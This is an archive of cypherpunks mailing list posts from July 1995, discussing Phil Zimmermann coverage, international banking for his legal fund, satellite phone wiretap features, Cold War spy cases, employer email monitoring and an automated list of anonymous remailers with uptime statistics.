From: sp7yav@kielce.ampr.org
Date: Sun, 30 Jul 95 12:23:57 PDT
To: cypherpunks@toad.com
Subject: punk's not dead!
Message-ID: <8779@kielce.ampr.org>
MIME-Version: 1.0
Content-Type: text/plain


hello? i'am new on this stuff, help me!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sun, 30 Jul 95 21:27:55 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ Interview in Infobahn Magazine
Message-ID: <ac41a60301021004e1e4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Lord, I'm going to get in trouble for writing this message...

(And Phil, if you happen to read Cypherpunks now and read this, understand
the context of my comments...)


At 12:57 AM 7/31/95, K. M. Ellis wrote:
>I generally try to avoid buying anything with the word "Infobahn" on it,
>but in the premiere issue of this new magazine there's a 5-page article
>about Phil Zimmerman written by Jeff Elliot (of the National Review...but
>it's a good article anyway ;).  It's pretty good--if anyone is new to the
>ongoing Zimmerman drama it's a good sum-up.

It may be a good article, but as soon as I saw yet another "personality"
interview with PRZ in the new trendzine "Infobahhn," I put the issue back
on the shelf. (Not just because of the PRZ personality piece, but because
I'm ODd (that's "overdosed" to you younger folks) on "Wired," "Mondo 2000,"
"Access," "Ray Gun," "The Net", and all the slightly more technical
magazines like "MIME World," "Java Times," and "Diffie-Hellman Newsletter"
(yes, these last three items are fictitious).

Just my opinion, but I think the Information Superhypeway is indeed being
over-hyped.

In case you're wondering, I did indeed agree to be photographed for the
cover of "Wired" #2, a few years ago. All I can say is, "I'm sorry."

Bay Aryans can attest to the fact that in the last several months I've
refused to have anything to do with the various hypings and personality
profiles the info rags are so focussed on. I enjoyed talking to Timothy
Leary for a few minutes at a party, but refused to appear on camera with
him in a "Cypherpunks on parade" segment for a Japanese television program.

I'm not condemning those who do interviews--I did a few myself--but I think
there' something to be said for avoiding the "personality profiles" which
so superficially cover the issues.

(At least it's not (yet?) as bad at the media's fascination with Mitnick
and Shimomura....I about barfed to read the tale of "The Hooker and the
Hacker" in the latest "Esquire," the one with Cindy Crawford on the cover.
Then, just today, my younger brother told me he'd been reading about
Mitnick and Shimomura in "Rolling Stone.")

Anyway, flame away with your claims that publicity is good, that the dozens
of PRZ interviews are doing some good.

I'm becoming more of a Zen Buddhist monastic skeptic on these issues every day.


--Tim May, happy to be far from the madding crowd

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 30 Jul 95 21:40:08 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: U.S. Banks are not all that bad
Message-ID: <v02120d01ac4219a2e38e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



As near as I can tell, there are spotty instances of the
behavior Lucky describes, but it is becoming more common,
especially wrt required ID.

I must say that I've had some absolutely amazingly bad experiences
with banks in Asia, Mexico and Central America, so I'm a skeptic
when it comes to assuming that non-US banks are light years better.
Although I have no direct experience of European banking, I do know that
the European banking industry, taken as a whole, is substantially
behind the US banking industry in automation and efficiency. Most of
the irritation that I hear reported about US banks is the result
of pushing customers too hard to change expensive banking habits or
erecting policies that eliminate money-losing practices without regard
to their impact on customer goodwill.

At First Interstate recently, I had to make a withdrawal from
the teller, as the ATM was broken. Their policy _does_
reqiure a "counter check", and normally they charge, but when
I explained that the ATM was kaput they did it for free.
It is _much_ cheaper for them if you use the ATM, and this
kind of policy is designed to encourage you to do this. It's
the kind of thing that the market will sort out nicely --
if it irritates people and loses them money more than it
saves them money, they will stop doing it.

Remember, the US has an absolutely fantastic amount of competition
wrt banking services, especially when compared to other countries.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Sun, 30 Jul 95 19:42:52 PDT
To: cypherpunks@toad.com
Subject: Re: Zimmermann legal fund
In-Reply-To: <199507302305.TAA16631@bb.hks.net>
Message-ID: <Pine.SUN.3.91.950730213249.3889C-100000@bambam>
MIME-Version: 1.0
Content-Type: text/plain


> The US banking industry has gone to the dogs. The day a non-US bank offers
> an account that can be accessed over the net will be the day I close my US
> accounts.

Interesting idea ...

1st question or thing I would want to be certain of is the stability of the
currency of the realm so to speak. I wouldn't want to bank in a country that
had a weak currencey (sp) or was subject to roller coaster economics.  


-Mike

**************************************************************************
*   Personal internet account, opinions and ideas do not reflect those   *
*                         of my employer                                 *
*       Mike Bailey                     (hm)214-252-3915                 * 
*       email bailey@computek.net       (wk)214-456-4510                 *
*                                                                        *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*               http://www.computek.net/public/bailey/                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Sun, 30 Jul 95 22:23:41 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Sat phone permit "wire"taps
Message-ID: <199507310521.WAA08390@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>      "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include
>>    features to permit authorized eavesdropping, officials said. 

Sigh...

>> Hmm. Anyone here ever heard of the Walkers, or the Rosenbergs? 

Different cases - the Walkers gave away information on how the Yankees were
stealing Russian secrets, which the Russians patched up by encrypting.
The most current information on the Rosenbergs, gotten from decrypted Soviet
communications and declassified US and ex-Soviet files, indicates that Ethel
Rosenberg
was probably innocent of spying, and Julius was spying but didn't give away
any useful atomic secrets, and that the FBI probably knew at the time they
had Ethel killed that she was innocent.  Sometimes even having your secrets
cracked isn't enough to protect you....
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Sun, 30 Jul 95 22:24:12 PDT
To: Alex Tang <altitude@cic.net>
Subject: Re: building libraries
Message-ID: <199507310521.WAA08413@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:40 PM 7/28/95 -0400, Alex Tang wrote:
>> The answer is to have some non-USA entity build shareable full fledged 
>> full powered crypto libraries and provide them for free for the rest of 
>> the world and for all machines.
>Wouldn't there still be licensing issues to deal with (in the states at
>least)??  I'm sure RSA would claim that the package would be in violation
>of the licensing...

If you did everything in an RSAREF-compatible manner, that would help;
I think somebody outside the US has written an RSAREF-clone.
Some problems include building programs that have generic-callout hooks
instead of crypto-specific hooks (so that they don't get bitten by ITAR),
while still maintaining reasonable efficiency and convenience.

#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 30 Jul 95 23:25:54 PDT
To: dmandl@panix.com (David Mandl)
Subject: Re: The little sex kitten
In-Reply-To: <v01530501ac4040bb01c2@[166.84.250.21]>
Message-ID: <199507310618.XAA23903@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> The tightwad, privacy-loathing scumbags I work for sprang just such a
> document on us recently, and after squirming and bitching about it for a
> while, I actually did sign, simply because I wasn't prepared to lose my job
> at that point.  My fear, based on well-established tradition, is that
> eventually this will become widespread and more and more employers will
> monitor email, with coerced "consent."

	I really don't see what the big deal is. That's why you use a
commercial/non-work ISP for personal email, etc.

-- 
sameer						Voice:   510-601-9777
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sun, 30 Jul 95 20:41:06 PDT
To: cypherpunks@toad.com
Subject: Re: Zimmermann legal fund
Message-ID: <199507310338.XAA00176@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Mike wrote:

<snip>

>Interesting idea ...
>
>1st question or thing I would want to be certain of is the stability of the
>currency of the realm so to speak. I wouldn't want to bank in a country that
>had a weak currencey (sp) or was subject to roller coaster economics.  
>

<snip>

Who knows...An international free market in banking might eventually
lead us back to the evil old gold standard and slowly make the bureaucrats
of the Federal Reserve obsolete. How awful. <grin>
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMBxLLW1lp8bpvW01AQGw8AP/fAWaHgPO064Pv/4JoqcrLDmBBytGR0Tz
MfArYuG7/yogyewbZaRkW/MAk7T4IsfXO3BnCQu8PS2MoaGTpTNE3qd30CP6G0v8
4ljZVUCgA+BW8yXfZVWUm+rsoZ8xXkZvtu6Ug8PKMjLzOoeSm+ET4Oq47SUKqSVC
mHQVFh92asQ=
=L5vT
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"This year or next, for the first time since the end of World War II,
we will spend more for interest payments on the debt than on defense.
Quite a stunning thing."  --  President  Bill Clinton
"I'm sure as hell stunned!"  --  citizen Jim Ray
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBxQGioZzwIn1bdtAQFwzQGA1rJZcc07cuvSS9T0ktCECLfZYuPboy3n
u00aBTPNMYTLXNc6V4vtHYAn85QOn7dT
=bQfM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Sun, 30 Jul 95 23:38:36 PDT
To: nsb@nsb.fv.com
Subject: Re: Zimmermann legal fund
Message-ID: <199507310635.XAA25441@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:23 PM 7/30/95 EDT, nsb@nsb.fv.com wrote:
>To pay into non-US accounts, we need to establish banking relationships in
>other venues.  For the most part, we need to do it one country at a time,
>which is awesomely time-consuming .....
>Remember, the requirement is not that you be in the US, but rather than you
>have an account in a US bank.  This is not all that hard for a non-US
>citizen to do **IF** you can show up physically at a US bank.  Thus, if
>there's a US bank that has an office near you, you can walk in and open an
>account to which deposits can be made through the US direct-deposit system,
>and  you're in business with FV.

Aren't there some banks or similar companies that are world-wide,
but have US branches?  I think SwissBankCorp or somebody like that
has an office in San Francisco; would it be possible for you to transfer
money to someone with an account there who's really in, say, Switzerland
or the UK or Hong Kong?
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 30 Jul 95 21:25:48 PDT
To: MR ELDON B JENKINS <QLDM75A@prodigy.com>
Subject: Re: C'punks at DefCon
In-Reply-To: <013.09272796.QLDM75A@prodigy.com>
Message-ID: <Pine.D-G.3.91.950731001926.21909A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 30 Jul 1995, MR ELDON B JENKINS wrote:

As you may recall from my earlier remarks, I'll be in Vegas for a 
vacation, but am leaving Friday morning.  For anyone who gets there early 
and would like to have a drink and chat with a non-lurking fed, I'll 
stroll through the Tropicana lobby around 7:00 p.m. Thursday, wearing 
some law enforcement icon (probably my "FBI Training Academy" shirt).

I hope the Tropicana has metal detectors ...

EBD

> > Are any of us cpunks having a gathering at Defcon?  (besides the 
> > one
> 
> Well, a couple other c'punks have mailed me to determine a time and a 
> 
> place.  It looks like everyone wants to meet in the lobby of the 
> Tropicana sometime Friday before Hacker Jeopardy.  Nobody has stated 
> 
> a concrete time yet so I guess we'll all just wander through the 
> lobby every now and then.  Any suggestions on a time?
> 
> Eldon Jenkins
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 31 Jul 95 00:30:33 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ Interview in Infobahn Magazine
Message-ID: <199507310728.AAA06576@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:32 PM 7/30/95 -0700, Timothy C. May wrote:
>
> I'm going to get in trouble for writing this message...
Heh, heh.

Infobahn also has an article by Sandy Sandfort in it; Sandy had it at
the SF Cpunks meeting, so I assumed I'd be able to find it at the store
(haven't yet; the first issue was 40K copies for nationwide distribution.)

Michael Berch, the publisher, is a reasonable guy, if you like his type.
mcb@postmodern.com (infobahn.com was taken).  He's got some lawyer background
and hacked computers at LLNL for a while.

>Bay Aryans 
Gack.  You will get in trouble  :-)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Mon, 31 Jul 95 00:42:04 PDT
To: sameer@c2.org (sameer)
Subject: Re: The little sex kitten
Message-ID: <9507310742.AA17010@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>> ...scumbags I work for sprang just such a document on us....
>> I actually did sign....

Did you promise not to use strong crypto?  

My (definitely NOT scumbag etc.) employer has notified all 
email users that email is NOT private.  As far as I know, 
(and I think I WOULD know) management has never examined email 
not addressed to them, but if they felt it was justified, 
I'm sure they would.  After all, it is their computer.....

Its not censorship when you refuse to pay for the podium!
Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Mon, 31 Jul 95 00:54:16 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Sat phone permit "wire"taps
Message-ID: <9507310754.AA17446@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



>Different cases - the Walkers gave away information on how the Yankees were
>stealing Russian secrets, which the Russians patched up by encrypting.

Really?  Do you have a reference for this?  I am interested.

>The most current information on the Rosenbergs, gotten from decrypted Soviet
>communications and declassified US and ex-Soviet files, indicates that Ethel
>Rosenberg
>was probably innocent of spying, and Julius was spying but didn't give away
>any useful atomic secrets, and that the FBI probably knew at the time they
>had Ethel killed that she was innocent.  

WOW!  Had them killed?  They WERE tried and convicted, you know.  Are you 
claiming evidence was manufactured?  I head David Khan on CSPAN say that 
at least one message mentions Ethel Rosenberg.  If memory serves, he said 
something like "without going in to whether evidence was sufficient to 
convict, and without going in to whether they should have been executed, 
these transcripts show that they were spying for the Soviets"  
(I'm not sure that's accurate enough for quotation marks, but that's the 
basics of what he said.  I have it on VCR.

Do you have additional information?  I'll agree the FBI hasn't always behaved 
honorably, and maybe they aren't entitled to the benefit of the doubt here.

OTOH, actual, admitted facts to this effect might be a great reply to Mr. Freeh 
when he asks to be allowed to punish us when we make our mail so he can't read 
it.
Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sun, 30 Jul 95 15:58:33 PDT
To: cypherpunks@toad.com
Subject: Re: Zimmermann legal fund
Message-ID: <199507302258.AA04135@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald sez:

[..]
: US banks simply do not work well for international transactions.

: The problem is not so much money laundering laws as intolerable
: ignorance, provincialism, and incompetence.

: If you insist that international transactions be mediated through 
: US banks, you are cutting your throat.

: Go look for banks that are truly international.  You will not
: find them in America.

You could try ABN*AMRO of The Netherlands, they have offices
in most European countries, Asia, Middle East and Latin America,
beside that they are the largest foreign bank in the US owning
LaSalle in the Chicago area and European American Bank in the
New York area. Citicorp also claims to have a global presence.

--
Alex de Joode
Fear Uncertainty and Doubt, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 31 Jul 95 01:58:18 PDT
To: cypherpunks@toad.com
Subject: Re: Sat phone permit "wire"taps
Message-ID: <199507310855.BAA09829@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:34 AM 7/28/95 -0400, John A. Limpert wrote:
>Is there a technical reason why communications through these future
>satellite systems couldn't be encrypted? I thought that all of these
>systems were based on vocoders and digital transmission, just like
>a secure telephone.

There are four encryption issues - end-to-end, uplink, downlink, and
call-control.
End-to-end is generally your problem, but for typical satellite phone
(like a typical cellphone), if it's not built-on, it's a pain to add on;
at best you might get a phone with digital passthrough of some sort,
so you can send raw bits without a modem.  
Uplink and downlink encryption would be real nice, if the carrier provided them;
at best we'll probably see governments mandating access to session keys
(which the satellites could be equipped to provide), with commercial market 
needs forcing some kind of encryption to prevent eavesdropping (especially
on downlinks, of course.)  The limits aren't technical.
Call-control encryption is an interesting question - there'll certainly
have to be authentication, and you probably won't see phone-credit-card numbers
on the downlink, but you probably _will_ see cleartext set-ids on most services.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 31 Jul 95 01:58:41 PDT
To: cypherpunks@toad.com
Subject: Re: The Net (short movie review)
Message-ID: <199507310856.BAA09839@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:33 AM 7/29/95 -0400, Robert Hettinga wrote:
>At 3:04 AM 7/29/95, Joel McNamara wrote:
>>Don't bother.  Better to wait until it hits the video shelves then have a
>>party and see who can find the most (of many) technical flaws and gaffs.
>>Would be much more entertaining in that context.
>
>Agreed. In television interviews Ms. Bullock talks about how she's "on the
>net all the time" while in further conversation it's clear that all she
>does is hang out in AOL auditoria and chat-rooms, probably with some
>net.flack at her elbow....

So good for her.  I've spent most of the evening chatting on cypherpunks and
cyberia
rather than writing code....  Some recent survey found that 60% of time that
average folks spend on the net is communications rather than information
retrieval.

I rather enjoyed the movie, though I did share the experience of being
one of the two or three people in the theater laughing at various technical 
gaffes and/or in-jokes.  Obviously, you can't take anything from Hollywood too
seriously technically, but they did look at a few social issues related to
computerisation, such as the isolation, computer addiction, lack of face-to-face
relationships, difficulty in knowing what's real when everything's on the
computer,
vulnerability of society to computer problems, trustability of people who
tell you
that you can trust their computer security system for everything - even the 
government uses it!   So they didn't look into them too deeply - they're
Hollywood.
That's not their job :-)  Also, I like Sandra Bullock, and I think her acting
pulled the movie together more than the script did.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 31 Jul 95 02:15:28 PDT
To: hoz@univel.telescan.com (rick hoselton)
Subject: Re: Sat phone permit "wire"taps
Message-ID: <199507310913.CAA02091@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:52 AM 7/31/95 -0700, rick hoselton wrote:
>
>>Different cases - the Walkers gave away information on how the Yankees were
>>stealing Russian secrets, which the Russians patched up by encrypting.
>
>Really?  Do you have a reference for this?  I am interested.
No refs, this is just memory of the news.  There was an undersea cable
north of Siberia somewhere that carried a lot of unencrypted military
traffic, which US Submarines were eavesdropping on.  I think Walker was
the one who leaked it, and they started encrypting.  Refs on the Walkers
should be easy to find in the library; there were a couple of books.
>
>>The most current information on the Rosenbergs, gotten from decrypted Soviet
>>communications and declassified US and ex-Soviet files, indicates that Ethel
>>Rosenberg
>>was probably innocent of spying, and Julius was spying but didn't give away
>>any useful atomic secrets, and that the FBI probably knew at the time they
>>had Ethel killed that she was innocent.  
>
>WOW!  Had them killed?  They WERE tried and convicted, you know. 

Yes, with government-provided evidence, and with the government withholding
inconvenient evidence.  There was a story on KPFA radio in the last week or so
covering an article on the Rosenbergs in some lefty magazine, probably The
Nation,
by a couple who have been strong supporters of them for years, and are now
saying that "sorry, friends, it looks like Julius _was_ spying, though not
atomically".
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Mon, 31 Jul 95 02:34:02 PDT
To: cypherpunks@toad.com
Subject: "Codebreakers" on PBS
Message-ID: <199507310932.CAA27798@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    For the Bay Area, on KQED at 8 p.m. Tuesday. The NOVA show
    "The World War II codebreaking efforts known as Enigma and Purple"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 31 Jul 95 06:50:46 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199507311350.GAA26013@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

21 Apr 1995: The new version of premail (0.33) is out, with direct
posting, perl5 and better MH support, and numerous bug fixes.

Last ping: Mon 31 Jul 95 6:00:04 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
spook    remailer@spook.alias.net         ****+-******    16:34  99.99%
vishnu   mixmaster@vishnu.alias.net       **+*+-******    16:39  99.95%
gondolin mixmaster@gondolin.org           -------* -++  1:28:04  99.92%
ford     remailer@bi-node.zerberus.de     -**-+-*.*-*#    46:06  99.86%
ideath   remailer@ideath.goldenbear.com   .-.......-   13:23:04  99.84%
vox      remail@vox.xs4all.nl             .--..-..-..  23:22:24  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           #*** -****##    11:33  99.68%
portal   hfinney@shell.portal.com         **** -****##     7:01  99.67%
replay   remailer@replay.com              +***  ******    15:31  99.32%
alumni   hal@alumni.caltech.edu           **** -****##     7:38  99.17%
rmadillo remailer@armadillo.com           ++++-. ++.-+  4:01:54  99.15%
hacktic  remailer@utopia.hacktic.nl       ****  ******    16:41  98.62%
crown    mixmaster@kether.alias.net       -+--- +----   2:00:09  98.43%
rebma    remailer@rebma.mn.org            +_.-..--..+  23:31:28  97.97%
extropia remail@extropia.wimsey.com       ..--.---.    13:06:46  94.87%
penet    anon@anon.penet.fi               -------- -**  4:39:15  91.60%
hroller  hroller@c2.org                   #*--+--*  -+  3:17:36  90.05%
rahul    homer@rahul.net                  ***++-*****#    10:25  99.99%
syrinx   syrinx@c2.org                    -- -----  -   5:03:24  88.62%
mix      mixmaster@remail.obscura.com     ---+----  .  15:07:06  85.77%
c2       remail@c2.org                      -----*  -+  3:59:22  85.39%
flame    remailer@flame.alias.net         +++++    +++    55:37  74.06%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
